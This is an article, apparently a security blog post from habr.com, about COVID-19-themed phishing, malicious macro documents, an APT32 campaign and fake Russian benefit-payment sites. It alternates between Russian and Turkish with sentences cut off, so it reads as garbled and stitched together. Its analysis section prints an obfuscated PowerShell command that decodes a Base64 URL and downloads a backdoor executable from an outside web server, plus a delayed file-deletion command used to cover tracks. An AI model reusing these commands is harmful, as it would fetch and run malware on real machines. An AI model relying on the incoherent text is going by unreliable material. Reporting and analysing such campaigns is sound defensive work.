Злоумышленники продолжают эксплуатировать тему COVID-19, создавая все новые и новые угрозы для пользователей, живо интересующихся всем, что касается эпидемии. В
Hatırla
Ücretsiz COVİD-19 testi ister misiniz?
Coronavirüs temalı kimlik avının bir diğer önemli örneği ise şuydu:
Убедить большинство пользователей в необходимости включить макросы тоже было несложно. Для этого применялся стандартный трюк, когда для заполнения анкеты нужно сначала разрешить макросы, а значит — запустить скрипт VBA.
Gördüğünüz gibi VBA betiği antivirüslerden özel olarak maskelenmiştir.
В Windows есть функция ожидания, когда приложение ждет /T <секунд>, прежде чем принять ответ “Да” по умолчанию. В нашем случае скрипт ждал 65 секунд, прежде чем удалить временные файлы:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
А в процессе ожидания происходила загрузка вредоносного ПО. Для этого был запущен специальный скрипт PowerShell:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
После декодирования значения Base64, скрипт PowerShell загружает бэкдор, находящийся на предварительно взломанном веб-сервере из Германии:
http://automatischer-staubsauger.com/feature/777777.png
ve şu adla kaydeder:
C:UsersPublictmpdirfile1.exe
Dosya ‘C:UsersPublictmpdir’
komutu içeren 'tmps1.bat' dosyası çalıştırıldığında silinir cmd /c mkdir ""C:UsersPublictmpdir"".
Devlet kurumlarına yönelik hedefli saldırı
Кроме этого недавно аналитики FireEye сообщили о целевой атаке APT32, направленной на правительственные структуры Уханя, а также Министерство Неотложной Помощи Китая (Chinese Ministry of Emergency Management). В одном из распотраняемых RTF содержалась ссылка на статью из New York Times под названием
Интересно, что на момент обнаружения ни один из антивирусов не детектировал этот экземпляр согласно данным Virustotal.
Resmi web siteleri kapalı olduğunda
Kimlik avı saldırısının en çarpıcı örneği geçtiğimiz gün Rusya'da yaşandı. Bunun nedeni, 3 ila 16 yaş arası çocuklar için uzun zamandır beklenen bir yardımın atanmasıydı. 12 Mayıs 2020'de başvuruların kabul edilmeye başlandığı duyurulduğunda, milyonlarca kişi uzun zamandır beklenen yardım için Devlet Hizmetleri web sitesine akın etti ve portalın profesyonel bir DDoS saldırısından daha kötü bir şekilde çökertilmesine neden oldu. Başkan, "Devlet Hizmetlerinin başvuru akışını karşılayamadığını" söylediğinde insanlar, başvuruları kabul etmek için alternatif bir sitenin başlatılması hakkında internette konuşmaya başladı.
Проблема заключается в том, что сайтов заработало сразу несколько, и пока один, настоящий по адресу posobie16.gosuslugi.ru действительно принимает заявления, еще
SearchInform'dan meslektaşlarımız .ru bölgesinde yaklaşık 30 yeni sahte alan adı buldu. Infosecurity ve Softline Company, Nisan ayının başından bu yana 70'ten fazla benzer sahte devlet hizmeti web sitesini takip etti. Yaratıcıları tanıdık sembolleri manipüle ediyor ve ayrıca gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie vb. kelimelerin kombinasyonlarını kullanıyor.
Heyecan ve sosyal mühendislik
Все эти примеры только подтверждают, что злоумышленники успешно монетизируют тематику коронавируса. И чем выше социальное напряжение и чем больше неясных вопросов, тем больше шансов у мошенников украсть важные данные, заставить людей самостоятельно отдать свои деньги или просто взломать побольше компьютеров.
Salgının potansiyel olarak hazırlıksız insanları toplu halde evden çalışmaya zorladığı göz önüne alındığında, yalnızca kişisel değil, kurumsal veriler de risk altında. Örneğin yakın zamanda Microsoft 365 (eski adıyla Office 365) kullanıcıları da bir kimlik avı saldırısına maruz kaldı. İnsanlar mektuplara ek olarak çok sayıda "cevapsız" sesli mesaj aldı. Ancak dosyalar aslında saldırının kurbanlarını e-posta adresine gönderen bir HTML sayfasıydı.
Kaynak: habr.com